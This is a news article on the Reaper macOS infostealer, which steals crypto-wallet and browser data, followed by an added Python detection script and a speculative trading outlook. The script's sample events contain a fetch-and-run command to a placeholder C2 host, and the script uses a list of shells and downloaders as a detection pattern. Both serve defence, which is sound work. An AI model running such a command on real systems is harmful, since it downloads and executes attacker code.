Reaper macOS malware steals crypto from Ledger/Trezor/Exodus
Reaper is a new macOS infostealer that hijacks Apple's Script Editor through a hidden AppleScript delivered via an applescript:// URL, bypassing the usual Terminal-focused defenses. Researchers say it spreads via typosquatted fake download pages for apps like WeChat and Miro, then prompts victims to enter their Mac password.
Once activated, the Reaper macOS malware checks the keyboard language and stops on Russian layouts. Otherwise, it uses an automated “ClickFix”-style delivery: when the user clicks the Script Editor “play” button, hidden commands run, with the malicious payload concealed behind ASCII art and whitespace.
The attack targets crypto wallet software including Ledger Live, Trezor Suite, and Exodus. It can modify wallet internals to intercept future transactions and redirect funds. It also steals browser data: saved credentials from Chrome, Firefox, and Edge, plus extension data such as MetaMask and 1Password.
Reaper also compresses documents on Desktop/Documents (e.g., .docx, .pdf, .xlsx, .wallet, .keys) into ~70MB ZIP chunks and uploads them to an external command-and-control server. For persistence, it installs a backdoor disguised as a Google Software Update directory.
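As an added illustration (not code from the article or from any vendor's product), the following Python script shows how a detection team might hunt for the two behaviours described above: Script Editor spawning a shell or downloader when the “play” button runs hidden commands, and a persistence item that borrows Google Software Update's name but executes from outside Google's real install location. The event format, the sample events, the file paths and the label strings are all constructed assumptions for illustration; the only real-world facts used are that Google's updater (Keystone) installs under a `Library/Google/GoogleSoftwareUpdate/` directory and labels its launch items `com.google.keystone.*`.

```python
"""Added example: rule-based triage of constructed macOS endpoint events.

Two rules are implemented:
  1. script_editor_spawn  - Script Editor launching a shell/downloader
     (the ClickFix "play button" behaviour described in the article).
  2. fake_google_updater  - a launch item that claims a Google Software
     Update identity but runs from somewhere other than Google's real
     install root (the disguised persistence directory).
Event shapes and sample values are assumptions, not real telemetry.
"""
import json
import os

# Child processes a user running a script in Script Editor would not
# normally expect; any of these is worth a closer look (assumed list).
SUSPICIOUS_CHILDREN = {"sh", "bash", "zsh", "osascript", "curl", "nscurl", "python3", "perl"}

# Google's real updater (Keystone) lives under this directory at either the
# system level (/Library/...) or user level (~/Library/...).
GOOGLE_UPDATE_ROOT = "/Library/Google/GoogleSoftwareUpdate/"

# Constructed sample events (JSON lines), not captured from a real host.
SAMPLE_JSONL = """
{"type": "process", "parent": "Script Editor", "image": "/bin/sh", "args": ["sh", "-c", "curl -fsSL http://PLACEHOLDER-C2.invalid/p | sh"]}
{"type": "process", "parent": "Script Editor", "image": "/usr/bin/say", "args": ["say", "hello"]}
{"type": "process", "parent": "Terminal", "image": "/bin/zsh", "args": ["zsh"]}
{"type": "launch_item", "label": "com.google.keystone.agent", "program": "/Users/alice/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/GoogleSoftwareUpdateAgent.app/Contents/MacOS/GoogleSoftwareUpdateAgent"}
{"type": "launch_item", "label": "com.google.keystone.agent", "program": "/Users/alice/Library/Application Support/Google Software Update/update"}
"""


def parse_jsonl(text):
    """Parse one JSON object per non-empty line into a list of dicts."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def script_editor_spawn(ev):
    """Flag Script Editor spawning a shell, interpreter or downloader."""
    if ev.get("type") != "process" or ev.get("parent") != "Script Editor":
        return None
    child = os.path.basename(ev.get("image", ""))
    if child in SUSPICIOUS_CHILDREN:
        return f"Script Editor spawned {child}: {' '.join(ev.get('args', []))}"
    return None


def fake_google_updater(ev):
    """Flag a launch item that claims Google Software Update identity but
    runs from outside Google's real install directory."""
    if ev.get("type") != "launch_item":
        return None
    label = ev.get("label", "").lower()
    program = ev.get("program", "")
    claims_google = (
        "keystone" in label
        or "googlesoftwareupdate" in label
        or "google software update" in program.lower()
    )
    if claims_google and GOOGLE_UPDATE_ROOT not in program:
        return f"launch item {ev.get('label')} claims Google identity but runs {program}"
    return None


RULES = (script_editor_spawn, fake_google_updater)


def scan(events):
    """Run every rule over every event; return the list of finding strings."""
    findings = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                findings.append(hit)
    return findings


SAMPLE_EVENTS = parse_jsonl(SAMPLE_JSONL)

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print("ALERT:", finding)
```

Run against the constructed sample, the script raises exactly two alerts: the `sh` child of Script Editor and the launch item whose program path sits outside Google's updater directory, while the legitimate Keystone agent and the ordinary Terminal shell pass. On a real fleet the same two rules would be fed from an EDR's process and launch-item telemetry rather than an inline string.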
Security teams note this is the third recent campaign (within roughly two months) using the same AppleScript/ClickFix approach. Microsoft’s Defender also documented related fake macOS troubleshooting delivery campaigns using similar “ClickFix” techniques.
For traders: this is a wallet-infection risk rather than an on-chain protocol exploit, but it can still trigger sudden, unrelated “withdrawal” flows and increase scam-driven volatility around wallet activity.
Bearish
This news is bearish mainly because it raises the probability of real-world wallet compromise—an off-chain threat that can still cause on-chain-like market effects. When wallet software (Ledger Live, Trezor Suite, Exodus) and browser credentials/extensions (MetaMask/1Password) are targeted, attackers can trigger sudden withdrawals, phishing reroutes, and “apparent sell pressure” that is unrelated to fundamentals.
In the short term, traders often see increased panic around wallet security, which can tighten liquidity and worsen reaction to any bad price prints (similar to prior waves of stealer malware and phishing campaigns that led to immediate user-driven selling and scam-related FUD). In the long term, widespread reporting tends to improve user hygiene (avoiding suspicious Script Editor prompts, verifying download sources) but does not remove the threat quickly, especially if distribution infrastructure remains active.
Because there is no direct protocol-level exploit or stated changes to major networks, the macro market stability impact should be limited; however, sentiment and exchange/whale flow monitoring may show abrupt spikes whenever infections are discovered or exploited.